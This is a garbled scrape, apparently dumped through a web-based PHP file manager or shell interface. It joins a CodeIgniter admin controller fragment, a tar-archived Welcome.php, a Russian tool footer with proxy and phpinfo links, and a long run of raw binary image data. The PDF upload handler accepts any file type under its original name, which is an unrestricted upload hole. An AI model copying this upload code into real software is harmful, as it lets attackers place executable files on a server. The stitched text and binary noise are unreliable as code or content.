if (!empty($_FILES['course_image']['name'])) { $config['upload_path'] = 'uploads/'; $config['allowed_types'] = 'jpg|jpeg|png|gif'; $config['file_name'] = $_FILES['course_image']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('course_image')) { $uploadData = $this->upload->data(); $course_image = $uploadData['file_name']; } } $data = array( 'course_title' => $this->input->post('course_title'), 'cat_id' => $this->input->post('category_id'), //'sub_category_id' => $this->input->post('subcategory_id'), 'course_description' => $this->input->post('course_description'), 'course_price' => $this->input->post('course_price'), 'video_type' => $this->input->post('video_type'), 'video' => $video, 'course_image' => $course_image, 'is_premium' => $is_premium, 'created_date' => date('Y-m-d H:i:s'), ); $insert = $this->Common->insert('course', $data); print_r($insert); } } public function insert_category() { if (!empty($this->input->post('category_id'))) { $where = array('fld_id' => $this->input->post('category_id')); $old_data = $this->Common->select_where_result('category', $where); $course_image = $old_data['category_image']; if (!empty($_FILES['category_image']['name'])) { $config['upload_path'] = 'uploads/category/'; $config['allowed_types'] = 'jpg|jpeg|png|gif'; $config['file_name'] = time() . trim($_FILES['category_image']['name']); //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('category_image')) { $uploadData = $this->upload->data(); $course_image = $uploadData['file_name']; } } $data = array('category_image' => $course_image, 'category_title' => $this->input->post('category_title')); $update = $this->Common->update('category', $where, $data); print_r($update); } else { $category_title = $this->input->post('category_title'); $course_image = ''; if (!empty($_FILES['category_image']['name'])) { $config['upload_path'] = 'uploads/category/'; $config['allowed_types'] = 'jpg|jpeg|png|gif'; $config['file_name'] = time() . trim($_FILES['category_image']['name']); //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('category_image')) { $uploadData = $this->upload->data(); $course_image = $uploadData['file_name']; } } $data = array( 'category_title' => $this->input->post('category_title'), 'category_image' => $course_image ); $insert = $this->Common->insert('category', $data); print_r($insert); } } public function insert_videos() { if (!empty($this->input->post('video_id'))) { $where = array('video_id' => $this->input->post('video_id')); if (!empty($_FILES['pdf']['name'])) { $config['upload_path'] = 'uploads/pdf/'; $config['allowed_types'] = '*'; $config['file_name'] = $_FILES['pdf']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('pdf')) { $uploadData = $this->upload->data(); $pdf = $uploadData['file_name']; $data = array( 'course_id' => $this->input->post('video_type'), 'session_id' => $this->input->post('session_type'), 'videos_name' => $this->input->post('video_title'), 'video_description' => $this->input->post('video_description'), 'video_link' => $this->input->post('video_link'), 'live' => $this->input->post('live'), // 'live_status' => $this->input->post('live_status'), //'video' => $video, 'pdf' => $pdf, 'created_date' => date('Y-m-d H:i:s'), ); } } else { $data = array( 'course_id' => $this->input->post('video_type'), 'session_id' => $this->input->post('session_type'), 'videos_name' => $this->input->post('video_title'), 'video_description' => $this->input->post('video_description'), 'video_link' => $this->input->post('video_link'), 'live' => $this->input->post('live'), // 'live_status' => $this->input->post('live_status'), 'created_date' => date('Y-m-d H:i:s'), ); } $update = $this->Common->update('videos', $where, $data); print_r($update); } else { $video = ''; if (!empty($_FILES['pdf']['name'])) { $config['upload_path'] = 'uploads/pdf/'; $config['allowed_types'] = '*'; $config['file_name'] = $_FILES['pdf']['name']; //Load upload library and initialize configuration $this->load->library('upload', $config); $this->upload->initialize($config); if ($this->upload->do_upload('pdf')) { $uploadData = $this->upload->data(); $pdf = $uploadData['file_name']; } } $data = array( 'course_id' => $this->input->post('video_type'), 'session_id' => $this->input->post('session_type'), 'videos_name' => $this->input->post('video_title'), 'video_description' => $this->input->post('video_description'), 'video_link' => $this->input->post('video_link'), 'live' => $this->input->post('live'), //'live_status' => $this->input->post('live_status'), 'pdf' => $pdf, //'video' => $video, 'created_date' => date('Y-m-d H:i:s'), ); $insert = $this->Common->insert('videos', $data); print_r($insert); } } public function logout() { $this->session->unset_userdata('admin_name'); $this->session->unset_userdata('admin_email'); $this->session->sess_destroy(); redirect('/admin'); } //////////////////////////////////////////////////////// // Code By Ash.. // /////////////////////////////////////////////////////// public function add_category() { $this->load->view('admin/include/header'); $this->load->view('admin/add_category'); $this->load->view('admin/include/footer'); } public function add_subcategory() { $data['error'] = ''; $this->load->view('admin/include/header'); $data['course_list'] = $this->Common->get_data_all_desc('category', $where = array(), $field = '*', 'fld_id'); //echo "<pre>"; //print_r($data['course_list']); //die; $this->load->view('admin/add_subcategory', $data); $this->load->view('admin/include/footer'); } public function category_list() { $data['course_list'] = $this->Common->get_data_all_desc('category', $where = array(), $field = '*', 'fld_id'); $this->load->view('admin/include/header'); $this->load->view('admin/category_list', $data); $this->load->view('admin/include/footer'); } public function edit_category() { $course_id = base64_decode($this->uri->segment(3)); $data['course_data'] = $this->Common->get_data_row('category', array('fld_id' => $course_id), $field = '*', 'fld_id'); $this->load->view('admin/include/header'); $this->load->view('admin/edit_category', $data); $this->load->view('admin/include/footer'); } public function edit_subcategory() { $course_id = base64_decode($this->uri->segment(3)); $data['course_list'] = $this->Common->get_data_all_desc('category', $where = array(), $field = '*', 'fld_id'); $data['course_data'] = $this->Common->get_data_row('sub_category', array('fld_id' => $course_id), $field = '*', 'fld_id'); // echo "<pre>"; // print_r($data['course_list']); // die; $this->load->view('admin/include/header'); $this->load->view('admin/edit_subcategory', $data); $this->load->view('admin/include/footer'); } public function subcategory_list() { $data['course_list'] = $this->get_sub_categoryData(); // echo "<pre>"; // print_r($data['course_list']); // die; $this->load->view('admin/include/header'); $this->load->view('admin/subcategory_list', $data); $this->load->view('admin/include/footer'); } public function get_sub_categoryData() { $this->db->select("a.*,b.category_title"); $this->db->from("sub_category as a"); $this->db->join("category as b", "a.category_id=b.fld_id", "LEFT"); $this->db->where("a.status", "1"); $respArr = $this->db->get()->result_array(); return ($respArr) ? $respArr : null; } } ��������������������������������������������������������������������������������������Welcome.php�����������������������������������������������������������������������������������������0000666�����������������00000001711�14756273354�0006674 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php defined('BASEPATH') OR exit('No direct script access allowed'); class Welcome extends CI_Controller { public function __construct() { parent::__construct(); //load user model } /** * Index Page for this controller. * * Maps to the following URL * http://example.com/index.php/welcome * - or - * http://example.com/index.php/welcome/index * - or - * Since this controller is set as the default controller in * config/routes.php, it's displayed at http://example.com/ * * So any other public methods not prefixed with an underscore will * map to /index.php/welcome/<method_name> * @see https://codeigniter.com/user_guide/general/urls.html */ public function index() { // $header_data['main_category'] = $this->Common->selectall_where_result('main_category', array()); redirect(base_url("admin")); } } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
Переключить редактор
| ver. 1.4 |
Github
|
.
| PHP 7.1.2 | Генерация страницы: 0.18 |
proxy
|
phpinfo
|
Настройка
%# , #&')*)-0-(0%()(��C (((((((((((((((((((((((((((((((((((((((((((((((((((����"�������@�@�hC��}!���Ѱ��<"� 9iׂIIIHk�+?�c?��*Y�����!�du)b�T�9вU�$8G��I.�澬��D���Sq� q�}.<��Z�l�V!X� *x�-�\����t3i�Ũ�sNv71�ƛ\��z|t�L���$�����*f��kʮ��7�H;���~F%�'3�@�H�q�` 9mOL����/x@ @��G
d�8F�ه��Ka�Kdr�Fh.�]y4 JЛ��]�K�B�E$��$ $ �PR�����G�]��u�i$�$���'! "#031���C/Td=S�Q?���62Ccj{ ����̏d�چ/c�V�`��Wz͈�{Y`�d�h�L �]OB���l���o���mr���n��s-ڗEZ��N�_��1%b���H�ϣ������V�7):�ӷ)�}�~�(�;�!�b1�5K��[E�vϻ>��q.%� ���O���(�c�#x�$�'+��`٥v��v(�����M�"�v��B��.�a ���T�~�ϕ�hy(6nݱl��1yNɓx�������AR�8�rqv1.cS�+��_���&@�� �u�M�5Ĉ�Xm���eL�X�q��y#�9]�c�}ɄL��d�eJ몓���I1T�d��CaM�$��T�,�X �bʭ�!�%F5��X1x#���!�q��\��F��2��&Rq���C�ol~�̱�.0ϦL�d�`.������ ���m{�Y~k{C��}bv�;U��c<�r�~ɜs�1�j��]W�l��*նCr��Q�N9�-������d��E؛��nF��eړ�8(q��5UgRȱGTA��*������̆��V�珰����ezN��h�U]�T�FG�^���<��ay�,!���5.� �u�bΚ�V�J%��m�Dxn'�����6�@BPa�`��Hts� �ɮ���Ŏ�Zɬ��%B�X��d5Z���hC}�䅸�p+ k=��ʒ(�aՏFG&�%@/�{+�Yu+�ȣGѩ"O%�|vȲxF>�N(��ou�h6 &Y5��8�7�E$-��']n,@TD\��+���Ry�U��U^�Q,f>��1�����q��f��U��� ����F���ڥ��>I�����fNUw�u��#OMMQ6� N�*��_�� k� ����rS��`���1�:��!�F'<+� � b?O��2 !Q12A��� "3a������#$��?�,�7�!`yǮ(�1�6w��a���� �F�#��?*"s���v>��Ⱥ����f�v��͑���s����������]Gn��S ���ȥpG ы�E�g�)Z���x�rY�q�]�@f�_܃�pչEڎّC ����Ŝ*/ �h�O�Sv�و\��5��U��y��|o�Hm2C�S�BW����)��5��{T��W���=o*RA��<����L0g4{��쁢�ep�rw�8��7��U���t<Ԍѻ7�fGf�k}���Ê�㛆Gռz�Q@��{C��'G��8�!�S$�j��x���|���צV<��,����u�k�uu�rM�f�_dϣi ߫�ԟn�!K����mxu�=�槻�'j�X�����������%!A "1QR#Br��?�R:��R�n�b[�II?#��6<:�$gN����lGNlrr��dעMMn`ɿy�,�%B�e�W��dVS��r���� %�tT��(�ɷ��S�]�O]#�_LEMHN�M���kv���~X���O6�U�V_�����b���J�t�774����D!1AQa"2q�#3BRb����0���� 4CSr����cst�����?��^q���7�dG�U�"p��moz��'��n_x���唹e������<6��O�t���R>k��s=�Cr���e�?�i��� ����/��ں$be���o`ޮ�GHy�;fNAl�8��.�\�S������"���a�úF�YvNk�-*`v�k�ʈ2f�EE��Wa�,� �fF^#�;��[9��^~������Y$:0#W3������Z*���I�Z�ڹ�k�n--9=��G��;7F)m{T�Ɇ��=�����Ȭ5�5�B�aڞ5M����#m�5Ʀ��m�8��+Hh���$�}�:&�e�Q�[;i]С�:�:��o����$<~��5RB�?�s3�5�r��O��ֿ�w�P/��̅���(�Z6�R>)��N��4�!ʊ�wz�-�r�w+�yk���q�1�bKhƸ�4N�Ӑ�X����Q��_��})�+e1�5��n��q?��[�^�9�<�z3Fsi�8�'�)9p)�{��RP�Z+�*��p(aY��V����6l�g�9��;���d�u���Nt@�3�sTwzaŇ�GT�b�H��(#��*zc�������9K�b1�����t����Ê��
�Z?g�iD���H�R���B���^M����v���O���L�D,'d�q�C�P�����$Δ��U�֟֊=�s��F�$��J�ދZ?�N��������A�N�WP��,�� �¦�&;�x��dup�����i���Ipd���;�Dž!��ֿѮAb%�u��}j��-p��>I�[�N�bi����G�'�;4w�m]H�]����#LӘNN��R��������s�.]��en��-�8e��Ps����Q��;���ț�E�ݫ���7��g�_L��W��EZ:/��I���a�g�n�ܤ��iٹ���ŷ�T���H~i�a�����֎�~KV������ A-2m]�F"�m�9-Zbǰ�״ @����~�4�N�[�Uxč�tl>������u#r�gѐ�3���;M9�<�J�����1�vfL8����1�P�HgP�Xv��������{����O�}�n��KQ؋����7<�l�fey<�}�>�bX���4<`Y7���si��V)�s�:�{�rO�h�z �@4VW�B���&�������ɡob܋�F��4>y�s�fXWS�N�O$�,.u:�ԫ��g�yao4��$h��D#��ٸf^kh�7�#1Z�֥&���*�v-��;bޭ����Q�����h�ow�y]�ه.+�7�M�ⴻ �JY��g�f�i3q��KC��3�¹�?5�Z.N��^Z w���KF͂���7��ރ۞��wj��T�J.�q��\Sv1U����R��욽&�N����pЖ`�`у��m`v�n#z��4��>e��V�`'���h�����'�j�AҔ�-�4:H���n]9�h<��n����U�6m��2c�E�1/�Y�%���I��~ʏ�|VBƟ@����;�������%�M9M���}��1�D��d����%g���O��]��у&�r��f�7�uܲ���(!1AQaq�������0� ���?!��*��@)�Je�G��j��{�['��v+���������)���(�/����д%젍Z��kk�Lu�Rm���j.c���@Z� V�J��d��j���h6���2AO�� a;oBu���H�=���nK�W8�B�ɰ�u?��бأm,�sr����|����8˨i��qI2tZ�ۄJP��XE��������zޔj~]UMu����zv!����N�&�1�Y��zJ�ՠ��\p��o'ሸ�C؊Y��TD"HM5�Ъ��i߯a���F����A)�����ڮ����z�E���@�hg�֝8�1jk��\�M�3�8ܢ�� ������s�7����N}�ޭ������GN�Bc���L pk�;�J�δ3�e�iU�gAYW]\�>�GyگQ=��f�KA;T�a`eM+Q �� �Ln���̌]GM�����<Ħ�j���H��N�M�x�}aX{̣S� ��ԅ��n�MA�S�r�(����(�L��zo9���.�;
�ӳf������`Ӕ٢3�� IW��\9~_���saa�\ԊW�ܭX:���ӆ�38�ty*����N�qP����BI�Y��jE��>DP�!�R%-��4��'�皺;��~J�!�7m���X��h�P!曭���$�\�AYj�.lC��4��+�jD�dgC0-*���|��`ZD�+л�C"��)��s��8Kq�pq���Ms��4� ��7\U`�.��[Ey8��AH!/��,���(:M -�T䓥�~O�4-���Ԓn��}HDN7���K���$�_Ԕ䚞`�R�hB�_aX?4V��ŗ�@ه�u�a�;�{PcT+�������7YBo�?��r-ͩ{�ĎA�� ����˼n��M286��G���1���V�˜Jв"l��V5���5�C]h���̊�A���%� �'p���Ԃ���Ր��9=�d�=�e�{�'<3�_ �:^�~��4�(�n�-C�s��5m![�jmIqU�~�Tw8��`���p�H8�u�Д l m�aP�0�������9y����CM��F1G糞�.�U~�������FC�{�!e(Y�:���P����7~;�L�N^{�1r�\���ԬG(���0d�ÏO�qK�Z�⑼�T�{ 2��s��Kd�Տ?mMQ��=���6�7�i�����H+����9��d��=��;�QؤH8n�Lb�D��yS%�(�{b���Cu���p�t#C���$A"�H{���jqᶯ�:�n=E����hH�`�!�m��MA������?�v6���+MԿ⟚qK�i�D�*Q5��CZ���2�|]�:Xd+�t�:o@��M��� :�32��b����[\5=�ֵ7])�|t��Ϻ����w�B�ń�e���!`�:��I,��9:����j@/a 8����+<�u�(T^ۺ~��2oE�B�%b)��z��ݳځ�)��i�j��&��Fi`qr��w���7�@��P�� �3Z&<�m�S�C����7t�T����ƴ�q~J�e�r6�Z]�rL���ه�E17'�x���+[�ܜTc6�/�����W�`�qpMJ���N5^����x�}{l�Fm������1�oZ\�����/d�/6� �uӸ�0elXuX;M��$M�}mB��������Z%e���3f�js����O�J~2�z�86�*PB��v�Ν��e-��.�/��L�O����2����9���4}|��T5M���hÐ7�F*��l+y0����:|��=k[�d�;|�ԉe�=w�<��õ�<��'!1AQaq����� ������?��5����)�(���+>v����6&{���Ǹ@����M�����v��iA 6T'�w��h�s �E}�x��G&'g�� J~1q�f�f���&��q˘���-���vYm
�/i1 �I��6��u,)�#�,����l}*&`�$�ͬe�%�w3�x�Ѥ�Xc�D��执g�峕�5B/�|$��=���%8 a��2.l� c�@G� �\�/x[өq�]�v5?�����N|�!���\��,>��{�"r�/��?��&!1QAa�� ��ᑱ����?ĊD�肭�� nv@�yޝ (�����I ����U - ���b�m�E>,��1v!�d�&�� ���&�檔�5D�&0P��Ԕ�͒@Z��:E"� Q��`>PH:~�O�����P�3W��@hM��k�U��\�O��R�������5ʄ�,��f�|��r���}јxo)�"+h�QK���/��0�`�5�{M~�� ���'!1AQaq���0 �������?�?�k��#^�~�G��#V,������#Z�1'ܤ����������~p�O%O�O�\�q�`�~��}��E�Ű5 �輸�du����x\�$���s[�{T2t`B��gq�4Z]b� 㛪�3,(@����bAp�r)9:@|b�!r�g:N�^�Ʌ��� �x_�\��pm7I��0?>^k��������w���|.K�[sF@�]Gn*L �yO� le�P�.p��֍�j�S�=�ʨ�ןQF�"��5zʼn���k�*8�u" ����Fg��� �cSy�V������Ƈ��N��ؐ(�����48hV�A�ӎ^��^ ���jyB� ��p"�����y]�ļlU�(�7�U`3�pCGF'&yg������o��z������X��ν:�P"@�G@x[��o&MJ�$F.����hi w;}�/^͇q���n�mN�/�TQ���އ��O1\,}��bQ #¯^S!)��X���#GPȏ�t�� c^\��' }iIZ���a�)��������z��4͊�Ξy��48,��f���#�����KP!Jx�|w�ʆ�������������#��Z�������< �~K��r�p&qH/;�R���沽�+�E�R���~0v���V#ʀ�T��S(-ڝ��B�y�b�C�D������b��������8��~�= �Y�ͧ]��@n����M�k2�%�;�%,�r6�LR腻?^��;KŇ=�ք ���=`�ɥ��/����z�&�I{���#J��M���C��}�H9^UJ�,P ��pS����G�d69Ϭu���%"��ˢP��K�"k)��=��9� ����㇌,��Oli��Xzh� " � ������R��^�s����N�k��Q>�63(���� ��PQ�Py�����3����$f+W՛=4�ǁ`*��^��Eb�K�t�6��^��!�籷��ȭ��K{/;�L���p�x�����;a���Oلz�[�.NP4�]Gc�T�v����~sg'LED��]j��'�G�]�6rY����UPw�*O�İՋi�'8�۴�#g�Xx+=�eU6�R��c�"�u2��~�?n�y�;�u��3�'��6�f������b��߬M�$*��k&?6���*^1n����ێz)<��Gz� �����7����Y� ��ۃ)$A��2�L6� ե�H�<�r��#ʽ2��O��R���z�A��XW��@���������<�G� Ϥ�^�˓i�M�W���6 ��0��m){c�;ݧ�>R�a����}1�ٯ%�EY2�Q��Ep���$ ��E��qS��t#+x� *�h�UI��XM?�'//��a'�G�����q@���<��z��؟����cd��z�ˬT_u�Ѯ����&�z�k ��n ]�a%�py»�`Qd�xc������n�� ��*��oTd�;'j�<�!j���'�(~�ʹW�M� P�mȘ��@֨V+��R�`�$��`�+@��_[�kG����P���Zh9�R����&5b�v���Z���#p�&�Ա+��8�etZ7G���;��@"�e0���v7����?��z�?_���_�q1�T�"�p�ˎ/U 6_�B�>��0( ��}G#������Ȣ�p�� �9��;/& `�B&$�y��t(�*z�x���Ӕ������S�?Kȏ3���{p� b � ۍ-�z܈֦��6?<���ǬP�N�G �更� �6�/h�����0Z���������i�ua��e�*M'A� �x��v�q.>�F� oN{��Q���{gD��L��u��=|���O xN���d���q�8(��E�Uu��,��O� t�DJ ����;��G����e���C��VYZ�� ���T4{����(�Ӳ'c�t�f��w�c�jr�e�m �#7,�6��B�E4Q�P�.P�(&��^{9H-�m�o ��q�g1���=��>p�)/"p0!4�mS6ú�FN���h��D �)��XdT �FؤZ⸚�k���H�c8v� <���u�P�Հ���:��_�EN��|�ӛ��u?-�/�o�Lhk�ܸ�S�;�Rī�����T"�N����M��px7<�� j�$��`�Y)Pjh 5` K�Qf�4�C�bX"�D���;HD�Z�9R b�F)�UA����v�#��HD�!{������>I� �`�ԁ i�4�)t*�ç�Le�_���>ru�GEQg��ǔct��ō0��l6v���d�� ��GG8���v^�|�#JyZPSO�� Y�CuAߐ�"�x���OfHF@�K�V�!少Eҕ]h� ��[���)��.q����*0I<8��^�6�}p��^tho���ig�i����DK���p,��2�3�I��5����쓄OY�6s7Qs�Ow^�w�J/�A➰������0������g(Մ��y��Kԇ����QS��?H���w�X�=��ҞX�~���Q=�'���p?7�@g�~�G�}�r��g�T?���